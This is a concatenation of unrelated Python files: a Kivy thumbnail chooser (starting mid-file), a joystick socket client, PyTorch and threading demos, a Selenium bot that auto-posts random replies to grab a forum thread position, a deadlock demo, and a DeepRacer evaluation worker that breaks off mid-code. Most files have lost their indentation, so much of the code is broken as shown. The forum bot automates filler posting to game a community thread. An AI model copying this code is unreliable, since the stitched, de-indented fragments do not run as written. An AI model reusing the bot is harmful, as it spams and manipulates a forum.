            ext = '.jpg'
image = self._generate_image_from_data(
path,
ext,
pix.data
)
self._thumbs[path] = image
return image
def _gen_temp_file_name(self, extension):
return join(self.thumbdir, mktemp()) + extension
def _generate_image_from_data(self, path, extension, data):
# data contains the raw bytes
# we save it inside a file, and return this file's temporary path
image = self._gen_temp_file_name(extension)
        with open(image, "wb") as img:  # the embedded art/frame is raw bytes
img.write(data)
return image
def _generate_image_from_video(self, videoPath):
# we try to use an external software (avconv or ffmpeg)
# to get a frame as an image, otherwise => default file icon
data = extract_image_from_video(videoPath, self.thumbsize, self.play_overlay)
try:
if data:
return self._generate_image_from_data(
videoPath,
".png",
data)
else:
return VIDEO_ICON
except:
traceback.print_exc()
return VIDEO_ICON
def _gen_label(self, ctx):
size = ctx.get_nice_size()
temp = ""
try:
temp = os.path.splitext(ctx.name)[1][1:].upper()
except IndexError:
pass
if ctx.name.endswith(".tar.gz"):
temp = "TAR.GZ"
if ctx.name.endswith(".tar.bz2"):
temp = "TAR.BZ2"
if temp == "":
label = size
else:
label = size + " - " + temp
return label
def on_file_select(self, path):
pass
class ThreadedThumbnailGenerator(object):
"""
Class that runs thumbnail generators in a another thread and
asynchronously updates image widgets
"""
def __init__(self):
self.thumbnail_queue = []
self.thread = None
def append(self, widget, ctx, func):
self.thumbnail_queue.append([widget, ctx, func])
def run(self):
        if self.thread is None or not self.thread.is_alive():
self.thread = Thread(target=self._loop)
self.thread.start()
def _loop(self):
while len(self.thumbnail_queue) != 0:
# call user function that generates the thumbnail
image, ctx, func = self.thumbnail_queue.pop(0)
image.source = func(ctx)
# test if the file is a supported picture
# file
def is_picture(mime, name):
if mime is None:
return False
return "image/" in mime and (
"jpeg" in mime or
"jpg" in mime or
"gif" in mime or
"png" in mime
) and not name.endswith(".jpe")
def pix_from_art(art):
pix = None
if len(art) == 1:
pix = art[0]
elif len(art) > 1:
for pic in art:
if pic.type == 3:
pix = pic
if not pix:
# This would raise an exception if no image is present,
# and the default one would be returned
pix = art[0]
return pix
def get_mime(fileName):
try:
mime = mimetypes.guess_type(fileName)[0]
if mime is None:
return ""
return mime
except TypeError:
return ""
def extract_image_from_video(path, size, play_overlay):
data = None
if exec_exists(AVCONV_BIN):
data = get_png_from_video(AVCONV_BIN, path, int(size), play_overlay)
elif exec_exists(FFMPEG_BIN):
data = get_png_from_video(FFMPEG_BIN, path, int(size), play_overlay)
return data
# generic function that calls an external tool to extract a PNG
# from a video file; it returns the raw bytes, not an
# image file
def get_png_from_video(software, video_path, size, play_overlay):
return subprocess.Popen(
[
software,
'-i',
video_path,
'-i',
play_overlay,
'-filter_complex',
'[0]scale=-1:' + str(size) + '[video],[1]scale=-1:' + str(size) + '[over],' +
'[video][over]overlay=(main_w-overlay_w)/2:(main_h-overlay_h)/2',
'-an',
'-vcodec',
'png',
'-vframes',
'1',
'-ss',
'00:00:01',
'-y',
'-f',
'rawvideo',
'-'
],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE
).communicate()[0]
def stack_images(software, bg, fg, out):
# You need ImageMagick to stack one image onto another
p = subprocess.Popen([software, bg, "-gravity", "Center", fg, "-compose", "Over", "-composite", out])
p.wait()
def exec_exists(bin):
try:
subprocess.check_output(["which", bin])
return True
except subprocess.CalledProcessError:
return False
except OSError:
return False
except:
return False
def compute_size(maxs, imgw, imgh):
if imgw > imgh:
return maxs, maxs*imgh/imgw
else:
return maxs*imgw/imgh, maxs
if __name__ == "__main__":
from kivy.base import runTouchApp
from kivy.uix.boxlayout import BoxLayout
from kivy.uix.label import Label
box = BoxLayout(orientation="vertical")
fileChooser = StudioFileChooserThumbView(thumbsize=128)
label = Label(markup=True, size_hint_y=None)
fileChooser.mylabel = label
box.add_widget(fileChooser)
box.add_widget(label)
def setlabel(instance, value):
instance.mylabel.text = "[b]Selected:[/b] {0}".format(value)
fileChooser.bind(selection=setlabel)
runTouchApp(box)
|
hydrogenClient_surface.py
|
import sys
import socket
import select
import pygame
import time
import serial as s
import threading
from serial import SerialException
# import pyfirmata
######## Below is setup code needed only for reading controller input and packaging it for sending
pygame.init()
joystick1 = pygame.joystick.Joystick(0)
joystick2 = pygame.joystick.Joystick(1)
joystick1.init()
joystick2.init()
def print_data():
data = []
for x in range(6):
data.append(joystick1.get_axis(x))
# 0: x axis left thumb, 1: y axis left thumb
# 2: x axis right thumb, 3: y axis right thumb
# 4: right trigger, 5: left trigger
for x in range(6):
data.append(joystick1.get_button(x))
# A = 0, B = 1, X = 2, Y = 3, LB = 4, RB = 5
for x in range(6):
data.append(joystick2.get_axis(x))
for x in range(6):
data.append(joystick2.get_button(x))
mesg = ''
mesg = ' '.join([str(round(i, 2)) for i in data])
## data = joystick1.get_axis(0)
## data2 = joystick1.get_axis(1)
## data3 = joystick1.get_axis(2)
## data4 = joystick1.get_axis(3)
## data5 = joystick1.get_axis(4)
## data6 = joystick1.get_axis(5)
## data7 = joystick1.get_button(10)
## data8 = joystick2.get_button(1)
## data9 = joystick2.get_axis(0)
##
## data = round(data, 2)
## data2 = round(data2, 2)
## data3 = round(data3, 2)
## data4 = round(data4, 2)
## data5 = round(data5, 2)
## data6 = round(data6, 2)
## data9 = round(data9, 2)
## mesg = str(data) + " " + str(data2) + " " + str(data3) + " " + str(data4) + " " + str(data5) + " " + str(data6) +" "+str(data7) + " " + str(data7) + " " + str(data8) + " " + str(data9)
## # print msg
##
pygame.event.pump()
time.sleep(0.05)
return mesg
# #setup pyFirmata
# board = pyfirmata.Arduino('/dev/cu.usbmodem1421')
# #setup an iterator for safety
# iter8 = pyfirmata.util.Iterator(board)
# iter8.start()
# #locate pins
# pin9 = board.get_pin('d:9:s') #motor 1
# # pin8 = board.get_pin('d:8:s') #motor 2
# def move1(a):
# pin9.write(a)
# def move2(a):
# pin8.write(a)
######## Multiple clients connect to a server, then send and receive data to all clients
def chat_client(host='192.168.1.2',port=9009):
    if host is None or port is None:
if(len(sys.argv) < 3):
print('Usage: python chat_client.py hostname port')
sys.exit()
host = sys.argv[1]
port = int(sys.argv[2])
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(2)
# connect to remote host
try:
s.connect((host, port))
except:
print('Unable to connect')
sys.exit()
print('Connected to remote host. You can start sending messages')
print('[Me] ')
sys.stdout.flush()
while True:
socket_list = [sys.stdin, s]
# Get the list sockets which are readable
ready_to_read,ready_to_write,in_error = select.select(socket_list , [], [])
for sock in ready_to_read:
if sock == s:
# incoming message from remote server, s
data = sock.recv(4096)
if not data:
print('\nDisconnected from chat server')
sys.exit()
                else:
                    # clear the screen and print the received data
                    print('\033[2J', end='')
                    print(data.decode(errors='replace'))
                    print('[Me] ', end='')
            else:
                # stdin is readable; send the current controller state
                msg = print_data()
                s.send(msg.encode())
                print('\r\033[A\033[K', end='')
                print(msg + '\n[Me]', end='')
t1 = threading.Thread(target = chat_client)
t1.start()
|
async_p2p.py
|
import os
import torch
import torch.distributed as dist
import torch.multiprocessing as mp
"""Non-blocking point-to-point communication."""
def run(rank, size):
tensor = torch.zeros(1)
req = None
if rank == 0:
tensor += 1
# Send the tensor to process 1
req = dist.isend(tensor=tensor, dst=1)
print('Rank 0 started sending')
else:
# Receive tensor from process 0
req = dist.irecv(tensor=tensor, src=0)
print('Rank 1 started receiving')
req.wait()
print('Rank ', rank, ' has data ', tensor[0])
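# An illustrative variation (not part of the original tutorial code): the point
# of isend/irecv is that local work can overlap with the transfer, as long as
# the tensor is not touched before wait() returns:
#
#   req = dist.irecv(tensor=tensor, src=0)
#   partial = do_local_work()   # hypothetical helper, independent of `tensor`
#   req.wait()                  # tensor contents are only guaranteed valid here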
def init_process(rank, size, fn, backend='gloo'):
""" Initialize the distributed environment. """
os.environ['MASTER_ADDR'] = '127.0.0.1'
os.environ['MASTER_PORT'] = '29500'
dist.init_process_group(backend, rank=rank, world_size=size)
fn(rank, size)
if __name__ == "__main__":
size = 2
processes = []
mp.set_start_method("spawn")
for rank in range(size):
p = mp.Process(target=init_process, args=(rank, size, run))
p.start()
processes.append(p)
for p in processes:
p.join()
|
sys_exc_info.py
|
#!/usr/bin/env python3
# encoding: utf-8
#end_pymotw_header
import sys
import threading
import time
def do_something_with_exception():
exc_type, exc_value = sys.exc_info()[:2]
print('Handling {} exception with message "{}" in {}'.format(
exc_type.__name__, exc_value,
threading.current_thread().name))
def cause_exception(delay):
time.sleep(delay)
raise RuntimeError('This is the error message')
def thread_target(delay):
try:
cause_exception(delay)
except RuntimeError:
do_something_with_exception()
threads = [
threading.Thread(target=thread_target, args=(0.3,)),
threading.Thread(target=thread_target, args=(0.1,)),
]
for t in threads:
t.start()
for t in threads:
t.join()
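# Expected output (thread names can vary across Python versions): the thread
# with the shorter delay reports first, and each handler sees only its own
# thread's exception via sys.exc_info():
#
#   Handling RuntimeError exception with message "This is the error message" in Thread-2
#   Handling RuntimeError exception with message "This is the error message" in Thread-1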
|
main.py
|
#coding:utf-8
from tkinter import *
import time
from selenium import webdriver
from selenium.webdriver.common.keys import Keys
import threading
import random
class Automan(Frame):
def __init__(self,master=None):
Frame.__init__(self, master)
self.pack()
self.createWidgets()
def createWidgets(self):
self.username_var= StringVar(self,'')
self.password_var=StringVar(self,'')
self.login_url_var=StringVar(self,'http://dev3.securitytown.net/login')
self.auto_url_var=StringVar(self,'http://dev3.securitytown.net/group/14/thread/33')
#self.login_url_var=StringVar(self,'http://www.sectown.cn/login')
#self.auto_url_var=StringVar(self,'https://www.sectown.cn/group/14/thread/')
self.sleeptime_var=StringVar(self,'0.1')
self.target_floor_var=StringVar(self,'0')
self.con_var=StringVar(self,u'酷酷的我抢到了这一层!')
self.info_var=StringVar(self,u'')
self.check_box_var=IntVar(self)
self.hint_var=StringVar(self,u'不要多开该程序,需要重新抢楼的话请终止抢楼先。\n有问题就联系金成强。不要提奇奇怪怪的需求!\n')
self.hint_label=Label(self)
self.hint_label['textvariable']=self.hint_var
self.hint_label.pack()
self.username_label = Label(self)
self.username_label['text']=u'账号'
self.username_label.pack()
self.username_entry=Entry(self)
self.username_entry['textvariable']=self.username_var
self.username_entry.pack()
self.password_label=Label(self)
self.password_label['text']=u'密码'
self.password_label.pack()
self.password_entry = Entry(self)
self.password_entry['textvariable'] = self.password_var
self.password_entry.pack()
self.login_url_label=Label(self)
self.login_url_label['text']=u'登录账号网址'
self.login_url_label.pack()
self.login_url_entry = Entry(self)
self.login_url_entry['textvariable'] = self.login_url_var
self.login_url_entry['width']=30
self.login_url_entry.pack()
self.auto_url_label=Label(self)
self.auto_url_label['text']=u'抢楼网址'
self.auto_url_label.pack()
self.auto_url_entry = Entry(self)
self.auto_url_entry['textvariable'] = self.auto_url_var
self.auto_url_entry['width'] = 50
self.auto_url_entry.pack()
self.sleeptime_label=Label(self)
self.sleeptime_label['text']=u'刷新等待时间'
self.sleeptime_label.pack()
self.sleeptime_entry = Entry(self)
self.sleeptime_entry['textvariable'] = self.sleeptime_var
self.sleeptime_entry.pack()
self.target_floor_label=Label(self)
self.target_floor_label['text']=u'目标楼层'
self.target_floor_label.pack()
self.target_floor_entry = Entry(self)
self.target_floor_entry['textvariable'] = self.target_floor_var
self.target_floor_entry.pack()
self.con_label = Label(self)
self.con_label['text']='Content'
self.con_label.pack()
self.con_entry = Entry(self)
self.con_entry['textvariable'] = self.con_var
self.con_entry.pack()
self.check_box=Checkbutton(self,text=u'是否自动刷楼',variable=self.check_box_var)
self.check_box.pack()
self.botton1=Button(self)
self.botton1['text']=u'开始抢楼'
self.botton1['command']=self.thread_control
self.botton1.pack()
self.botton2 = Button(self)
self.botton2['text'] = u'停止抢楼'
self.botton2['command'] = self.quit_auto
self.botton2.pack()
self.info_label=Label(self)
self.info_label['textvariable']=self.info_var
self.info_label['bg']='red'
self.info_label.pack()
self.botton3=Button(self,text=u'测试')
self.botton3['command']=self.ceshi
self.botton3.pack()
self.thread_flag=True
def ceshi(self):
        self.lang_list = []
        with open('random_lang.txt', 'r', encoding='utf-8') as f:
            for line in f:
                self.lang_list.append(line)
def login(self):
self.username=self.username_var.get()
self.password=self.password_var.get()
self.login_url=self.login_url_var.get()
self.auto_url=self.auto_url_var.get()
self.browser = webdriver.Chrome('./chromedriver')
self.sleeptime=float(self.sleeptime_var.get())
self.target_floor=int(self.target_floor_var.get())-1
self.con=self.con_var.get()
self.browser.get(self.login_url)
user = self.browser.find_element_by_name('_username')
pwd = self.browser.find_element_by_name('_password')
user.send_keys(self.username)
pwd.send_keys(self.password)
pwd.send_keys(Keys.RETURN)
self.auto_done()
def auto_done(self):
self.browser.execute_script('window.open("%s")'%self.auto_url)
time.sleep(1)
handles = self.browser.window_handles
self.browser.switch_to_window(handles[-1])
floor=self.browser.find_elements_by_xpath('//*[@class="floor"]')
test_floor=floor[-1].text
test_floor_num=int(test_floor[:-1])
# last_page_ele = self.browser.find_element_by_xpath('//*[@class="pagination cd-pagination"]/li[last()]/a')
# last_page = last_page_ele.get_attribute('href')
last_page=self.auto_url_var.get()+'?page=99'
self.browser.execute_script('window.open("%s")' % last_page)
time.sleep(1)
while 1:
if self.thread_flag==False:
self.info_var.set(u'您已终止程序')
self.browser.quit()
break
if test_floor_num>31:
last_page_ele_try = self.browser.find_element_by_xpath('//*[@class="pagination cd-pagination"]/li[last()]/a')
last_page_try = last_page_ele_try.get_attribute('href')
if last_page_try!=last_page:
last_page=last_page_try
self.browser.execute_script('window.open("%s")' % last_page)
time.sleep(1)
else:
pass
handles = self.browser.window_handles
self.browser.switch_to_window(handles[-1])
floor = self.browser.find_elements_by_xpath('//*[@class="floor"]')
last_floor = floor[-1].text
self.info_var.set(u'目前楼层数' + last_floor)
last_floor_num=int(last_floor[:-1])
if last_floor_num == self.target_floor:
time.sleep(1)
self.get_floor()
# content = self.browser.find_element_by_tag_name('iframe')
# self.browser.switch_to_frame(content)
# p = self.browser.find_element_by_tag_name('body')
# p.send_keys(self.con)
# self.browser.switch_to_default_content()
# self.browser.find_element_by_id('post-thread-btn').click()
self.browser.quit()
self.info_var.set(u'恭喜抢楼成功,抢到楼层%d'%(self.target_floor+1))
break
else:
if last_floor_num<self.target_floor:
if self.check_box_var.get()==1:
self.browser.switch_to_window(handles[-1])
self.get_floor()
continue
self.browser.refresh()
time.sleep(self.sleeptime)
else:
self.browser.quit()
self.info_var.set(u'抱歉,您要抢的楼层已经不存在,重新调整楼层位置')
break
    # fill in the reply content and submit the post
def get_floor(self):
content = self.browser.find_element_by_tag_name('iframe')
self.browser.switch_to_frame(content)
p = self.browser.find_element_by_tag_name('body')
#p.send_keys(self.con)
p.send_keys(self.lang_list[random.randint(0,len(self.lang_list)-1)])
self.browser.switch_to_default_content()
self.browser.find_element_by_id('post-thread-btn').click()
pass
def quit_auto(self):
self.thread_flag=False
def read_lang(self):
        self.lang_list = []
        with open('random_lang.txt', 'r', encoding='utf-8') as f:
            for line in f:
                self.lang_list.append(line)
def thread_control(self):
self.thread_flag=True
self.t=threading.Thread(target=self.login)
        self.t.daemon = True
self.t.start()
if __name__ == '__main__':
root=Tk()
root.title(u'安全通内部抢楼机器人')
root.wm_attributes('-topmost', 1)
root.geometry('400x600+30+30')
auto_man=Automan(master=root)
auto_man.mainloop()
|
multithreading_deadlock.py
|
#coding=utf-8
'''
This example is for multithreading deadlock demo.
'''
import time
import threading
class Account:
def __init__(self, _id, money, lock):
self.id = _id
self.money = money
self.lock = lock
def withdraw(self, amount):
self.money -= amount
def deposit(self, amount):
        self.money += amount
def transfer(_from, to, amount):
    if _from.lock.acquire():  # lock our own account
        _from.withdraw(amount)
        time.sleep(1)  # stretch the transfer out so the two threads overlap long enough to deadlock
        print('wait for lock...')
        if to.lock.acquire():  # lock the other account
to.deposit(amount)
to.lock.release()
_from.lock.release()
print('finish...')
a = Account('a', 1000, threading.Lock())
b = Account('b', 1000, threading.Lock())
threading.Thread(target = transfer, args = (a, b, 100)).start()
threading.Thread(target = transfer, args = (b, a, 200)).start()
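# A minimal sketch of the usual fix (an assumption, not part of the original
# demo): acquire both locks in one globally consistent order, e.g. by account
# id, so neither thread can hold one lock while waiting for the other:
#
#   def transfer_ordered(_from, to, amount):
#       first, second = sorted([_from, to], key=lambda acc: acc.id)
#       with first.lock, second.lock:
#           _from.withdraw(amount)
#           to.deposit(amount)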
|
evaluation_worker.py
|
"""This module is responsible for launching evaluation jobs"""
import argparse
import json
import logging
import os
import time
from threading import Thread
import rospy
from markov import utils
from markov.agent_ctrl.constants import ConfigParams
from markov.agents.rollout_agent_factory import (
create_bot_cars_agent,
create_obstacles_agent,
create_rollout_agent,
)
from markov.agents.utils import RunPhaseSubject
from markov.boto.s3.constants import (
CAMERA_45DEGREE_LOCAL_PATH_FORMAT,
CAMERA_PIP_MP4_LOCAL_PATH_FORMAT,
CAMERA_TOPVIEW_LOCAL_PATH_FORMAT,
MODEL_METADATA_LOCAL_PATH_FORMAT,
MODEL_METADATA_S3_POSTFIX,
SIMTRACE_EVAL_LOCAL_PATH_FORMAT,
ModelMetadataKeys,
SimtraceVideoNames,
)
from markov.boto.s3.files.checkpoint import Checkpoint
from markov.boto.s3.files.model_metadata import ModelMetadata
from markov.boto.s3.files.simtrace_video import SimtraceVideo
from markov.boto.s3.utils import get_s3_key
from markov.camera_utils import configure_camera
from markov.constants import DEFAULT_PARK_POSITION, ROLLOUT_WORKER_PROFILER_PATH, SIMAPP_VERSION_2
from markov.defaults import reward_function
from markov.environments.constants import LINK_NAMES, STEERING_TOPICS, VELOCITY_TOPICS
from markov.log_handler.constants import (
SIMAPP_EVENT_ERROR_CODE_500,
SIMAPP_SIMULATION_WORKER_EXCEPTION,
)
from markov.log_handler.deepracer_exceptions import GenericRolloutError, GenericRolloutException
from markov.log_handler.exception_handler import log_and_exit
from markov.log_handler.logger import Logger
from markov.metrics.constants import MetricsS3Keys
from markov.metrics.iteration_data import IterationData
from markov.metrics.s3_metrics import EvalMetrics
from markov.reset.constants import RaceType
from markov.rollout_utils import (
PhaseObserver,
configure_environment_randomizer,
get_robomaker_profiler_env,
signal_robomaker_markov_package_ready,
)
from markov.rospy_wrappers import ServiceProxyWrapper
from markov.s3_boto_data_store import S3BotoDataStore, S3BotoDataStoreParameters
from markov.sagemaker_graph_manager import get_graph_manager
from markov.track_geom.track_data import TrackData
from markov.track_geom.utils import get_start_positions
from rl_coach.base_parameters import TaskParameters
from rl_coach.core_types import EnvironmentSteps
from rl_coach.data_stores.data_store import SyncFiles
from std_srvs.srv import Empty, EmptyRequest
logger = Logger(__name__, logging.INFO).get_logger()
MIN_RESET_COUNT = 10000 # TODO: change when console passes float("inf")
IS_PROFILER_ON, PROFILER_S3_BUCKET, PROFILER_S3_PREFIX = get_robomaker_profiler_env()
def evaluation_worker(
graph_manager,
number_of_trials,
task_parameters,
simtrace_video_s3_writers,
is_continuous,
park_positions,
race_type,
pause_physics,
unpause_physics,
):
"""Evaluation worker function
Arguments:
graph_manager(MultiAgentGraphManager): Graph manager of multiagent graph manager
        number_of_trials(int): Number of trials to run the evaluation for
task_parameters(TaskParameters): Information of the checkpoint, gpu/cpu,
framework etc of rlcoach
simtrace_video_s3_writers(list): Information to upload to the S3 bucket all the simtrace and mp4
is_continuous(bool): The termination condition for the car
park_positions(list of tuple): list of (x, y) for cars to park at
        race_type (str): race type
        pause_physics (ServiceProxyWrapper): ROS service proxy used to pause the physics
        unpause_physics (ServiceProxyWrapper): ROS service proxy used to unpause the physics
"""
    # Collect profiler information only if IS_PROFILER_ON is true
with utils.Profiler(
s3_bucket=PROFILER_S3_BUCKET,
s3_prefix=PROFILER_S3_PREFIX,
output_local_path=ROLLOUT_WORKER_PROFILER_PATH,
enable_profiling=IS_PROFILER_ON,
):
subscribe_to_save_mp4_topic, unsubscribe_from_save_mp4_topic = list(), list()
subscribe_to_save_mp4, unsubscribe_from_save_mp4 = list(), list()
for agent_param in graph_manager.agents_params:
racecar_name = (
"racecar"
if len(agent_param.name.split("_")) == 1
else "racecar_{}".format(agent_param.name.split("_")[1])
)
subscribe_to_save_mp4_topic.append(
"/{}/save_mp4/subscribe_to_save_mp4".format(racecar_name)
)
unsubscribe_from_save_mp4_topic.append(
"/{}/save_mp4/unsubscribe_from_save_mp4".format(racecar_name)
)
graph_manager.data_store.wait_for_checkpoints()
graph_manager.data_store.modify_checkpoint_variables()
# wait for the required cancel services to become available
if race_type != RaceType.F1.value:
# TODO: Since we are not running Grand Prix in RoboMaker,
# we are opting out from waiting for RoboMaker's cancel job service
# in case of Grand Prix execution.
# Otherwise, SimApp will hang as service will never come alive.
#
# If we don't depend on RoboMaker anymore in the future,
# we need to remove below line, or do a better job to figure out
# whether we are running on RoboMaker or not to decide whether
# we should wait for below service or not.
rospy.wait_for_service("/robomaker/job/cancel")
# Make the clients that will allow us to pause and unpause the physics
rospy.wait_for_service("/gazebo/pause_physics_dr")
rospy.wait_for_service("/gazebo/unpause_physics_dr")
pause_physics = ServiceProxyWrapper("/gazebo/pause_physics_dr", Empty)
unpause_physics = ServiceProxyWrapper("/gazebo/unpause_physics_dr", Empty)
for mp4_sub, mp4_unsub in zip(subscribe_to_save_mp4_topic, unsubscribe_from_save_mp4_topic):
rospy.wait_for_service(mp4_sub)
rospy.wait_for_service(mp4_unsub)
for mp4_sub, mp4_unsub in zip(subscribe_to_save_mp4_topic, unsubscribe_from_save_mp4_topic):
subscribe_to_save_mp4.append(ServiceProxyWrapper(mp4_sub, Empty))
unsubscribe_from_save_mp4.append(
Thread(target=ServiceProxyWrapper(mp4_unsub, Empty), args=(EmptyRequest(),))
)
graph_manager.create_graph(
task_parameters=task_parameters,
stop_physics=pause_physics,
start_physics=unpause_physics,
empty_service_call=EmptyRequest,
)
logger.info("Graph manager successfully created the graph: Unpausing physics")
unpause_physics(EmptyRequest())
is_save_mp4_enabled = rospy.get_param("MP4_S3_BUCKET", None)
if is_save_mp4_enabled:
for subscribe_mp4 in subscribe_to_save_mp4:
subscribe_mp4(EmptyRequest())
configure_environment_randomizer()
track_data = TrackData.get_instance()
# Before each evaluation episode (single lap for non-continuous race and complete race for
# continuous race), a new copy of park_positions needs to be loaded into track_data because
        # a park position will be popped from park_positions when a racer car needs to be parked.
if is_continuous:
track_data.park_positions = park_positions
graph_manager.evaluate(EnvironmentSteps(1))
else:
for _ in range(number_of_trials):
track_data.park_positions = park_positions
graph_manager.evaluate(EnvironmentSteps(1))
if is_save_mp4_enabled:
for unsubscribe_mp4 in unsubscribe_from_save_mp4:
unsubscribe_mp4.start()
for unsubscribe_mp4 in unsubscribe_from_save_mp4:
unsubscribe_mp4.join()
# upload simtrace and mp4 into s3 bucket
for s3_writer in simtrace_video_s3_writers:
s3_writer.persist(utils.get_s3_kms_extra_args())
time.sleep(1)
pause_physics(EmptyRequest())
if race_type != RaceType.F1.value:
            # Close down the job
utils.cancel_simulation_job()
def main():
"""Main function for evaluation worker"""
parser = argparse.ArgumentParser()
parser.add_argument(
"-p",
"--preset",
help="(string) Name of a preset to run \
(class name from the 'presets' directory.)",
type=str,
required=False,
)
parser.add_argument(
"--s3_bucket",
help="list(string) S3 bucket",
type=str,
nargs="+",
default=rospy.get_param("MODEL_S3_BUCKET", ["gsaur-test"]),
)
parser.add_argument(
"--s3_prefix",
help="list(string) S3 prefix",
type=str,
nargs="+",
default=rospy.get_param("MODEL_S3_PREFIX", ["sagemaker"]),
)
parser.add_argument(
"--aws_region",
help="(string) AWS region",
type=str,
default=rospy.get_param("AWS_REGION", "us-east-1"),
)
parser.add_argument(
"--number_of_trials",
help="(integer) Number of trials",
type=int,
default=int(rospy.get_param("NUMBER_OF_TRIALS", 10)),
)
parser.add_argument(
"-c",
"--local_model_directory",
help="(string) Path to a folder containing a checkpoint \
to restore the model from.",
type=str,
default="./checkpoint",
)
parser.add_argument(
"--number_of_resets",
help="(integer) Number of resets",
type=int,
default=int(rospy.get_param("NUMBER_OF_RESETS", 0)),
)
parser.add_argument(
"--penalty_seconds",
help="(float) penalty second",
type=float,
default=float(rospy.get_param("PENALTY_SECONDS", 2.0)),
)
parser.add_argument(
"--job_type",
help="(string) job type",
type=str,
default=rospy.get_param("JOB_TYPE", "EVALUATION"),
)
parser.add_argument(
"--is_continuous",
        help="(boolean) is continuous after lap completion",
type=bool,
default=utils.str2bool(rospy.get_param("IS_CONTINUOUS", False)),
)
parser.add_argument(
"--race_type",
help="(string) Race type",
type=str,
default=rospy.get_param("RACE_TYPE", "TIME_TRIAL"),
)
parser.add_argument(
"--off_track_penalty",
help="(float) off track penalty second",
type=float,
default=float(rospy.get_param("OFF_TRACK_PENALTY", 2.0)),
)
parser.add_argument(
"--collision_penalty",
help="(float) collision penalty second",
type=float,
default=float(rospy.get_param("COLLISION_PENALTY", 5.0)),
)
args = parser.parse_args()
arg_s3_bucket = args.s3_bucket
arg_s3_prefix = args.s3_prefix
logger.info("S3 bucket: %s \n S3 prefix: %s", arg_s3_bucket, arg_s3_prefix)
metrics_s3_buckets = rospy.get_param("METRICS_S3_BUCKET")
metrics_s3_object_keys = rospy.get_param("METRICS_S3_OBJECT_KEY")
arg_s3_bucket, arg_s3_prefix = utils.force_list(arg_s3_bucket), utils.force_list(arg_s3_prefix)
metrics_s3_buckets = utils.force_list(metrics_s3_buckets)
metrics_s3_object_keys = utils.force_list(metrics_s3_object_keys)
validate_list = [arg_s3_bucket, arg_s3_prefix, metrics_s3_buckets, metrics_s3_object_keys]
simtrace_s3_bucket = rospy.get_param("SIMTRACE_S3_BUCKET", None)
mp4_s3_bucket = rospy.get_param("MP4_S3_BUCKET", None)
if simtrace_s3_bucket:
simtrace_s3_object_prefix = rospy.get_param("SIMTRACE_S3_PREFIX")
simtrace_s3_bucket = utils.force_list(simtrace_s3_bucket)
simtrace_s3_object_prefix = utils.force_list(simtrace_s3_object_prefix)
validate_list.extend([simtrace_s3_bucket, simtrace_s3_object_prefix])
if mp4_s3_bucket:
mp4_s3_object_prefix = rospy.get_param("MP4_S3_OBJECT_PREFIX")
mp4_s3_bucket = utils.force_list(mp4_s3_bucket)
mp4_s3_object_prefix = utils.force_list(mp4_s3_object_prefix)
validate_list.extend([mp4_s3_bucket, mp4_s3_object_prefix])
    if not all(len(x) == len(validate_list[0]) for x in validate_list):
log_and_exit(
"Eval worker error: Incorrect arguments passed: {}".format(validate_list),
SIMAPP_SIMULATION_WORKER_EXCEPTION,
SIMAPP_EVENT_ERROR_CODE_500,
)
if args.number_of_resets != 0 and args.number_of_resets < MIN_RESET_COUNT:
raise GenericRolloutException("number of resets is less than {}".format(MIN_RESET_COUNT))
# Instantiate Cameras
if len(arg_s3_bucket) == 1:
configure_camera(namespaces=["racecar"])
else:
configure_camera(
namespaces=[
"racecar_{}".format(str(agent_index)) for agent_index in range(len(arg_s3_bucket))
]
)
agent_list = list()
s3_bucket_dict = dict()
s3_prefix_dict = dict()
checkpoint_dict = dict()
simtrace_video_s3_writers = []
start_positions = get_start_positions(len(arg_s3_bucket))
done_condition = utils.str_to_done_condition(rospy.get_param("DONE_CONDITION", any))
park_positions = utils.pos_2d_str_to_list(rospy.get_param("PARK_POSITIONS", []))
    # if park positions were not passed in (the all-done-condition case), use the default
if not park_positions:
park_positions = [DEFAULT_PARK_POSITION for _ in arg_s3_bucket]
for agent_index, _ in enumerate(arg_s3_bucket):
agent_name = "agent" if len(arg_s3_bucket) == 1 else "agent_{}".format(str(agent_index))
racecar_name = (
"racecar" if len(arg_s3_bucket) == 1 else "racecar_{}".format(str(agent_index))
)
s3_bucket_dict[agent_name] = arg_s3_bucket[agent_index]
s3_prefix_dict[agent_name] = arg_s3_prefix[agent_index]
# download model metadata
model_metadata = ModelMetadata(
bucket=arg_s3_bucket[agent_index],
s3_key=get_s3_key(arg_s3_prefix[agent_index], MODEL_METADATA_S3_POSTFIX),
region_name=args.aws_region,
local_path=MODEL_METADATA_LOCAL_PATH_FORMAT.format(agent_name),
)
model_metadata_info = model_metadata.get_model_metadata_info()
version = model_metadata_info[ModelMetadataKeys.VERSION.value]
# checkpoint s3 instance
checkpoint = Checkpoint(
bucket=arg_s3_bucket[agent_index],
s3_prefix=arg_s3_prefix[agent_index],
region_name=args.aws_region,
agent_name=agent_name,
checkpoint_dir=args.local_model_directory,
)
# make coach checkpoint compatible
if version < SIMAPP_VERSION_2 and not checkpoint.rl_coach_checkpoint.is_compatible():
checkpoint.rl_coach_checkpoint.make_compatible(checkpoint.syncfile_ready)
# get best model checkpoint string
model_checkpoint_name = checkpoint.deepracer_checkpoint_json.get_deepracer_best_checkpoint()
# Select the best checkpoint model by uploading rl coach .coach_checkpoint file
checkpoint.rl_coach_checkpoint.update(
model_checkpoint_name=model_checkpoint_name,
s3_kms_extra_args=utils.get_s3_kms_extra_args(),
)
checkpoint_dict[agent_name] = checkpoint
agent_config = {
"model_metadata": model_metadata,
ConfigParams.CAR_CTRL_CONFIG.value: {
ConfigParams.LINK_NAME_LIST.value: [
link_name.replace("racecar", racecar_name) for link_name in LINK_NAMES
],
ConfigParams.VELOCITY_LIST.value: [
velocity_topic.replace("racecar", racecar_name)
for velocity_topic in VELOCITY_TOPICS
],
ConfigParams.STEERING_LIST.value: [
steering_topic.replace("racecar", racecar_name)
for steering_topic in STEERING_TOPICS
],
ConfigParams.CHANGE_START.value: utils.str2bool(
rospy.get_param("CHANGE_START_POSITION", False)
),
ConfigParams.ALT_DIR.value: utils.str2bool(
rospy.get_param("ALTERNATE_DRIVING_DIRECTION", False)
),
ConfigParams.MODEL_METADATA.value: model_metadata,
ConfigParams.REWARD.value: reward_function,
ConfigParams.AGENT_NAME.value: racecar_name,
ConfigParams.VERSION.value: version,
ConfigParams.NUMBER_OF_RESETS.value: args.number_of_resets,
ConfigParams.PENALTY_SECONDS.value: args.penalty_seconds,
ConfigParams.NUMBER_OF_TRIALS.value: args.number_of_trials,
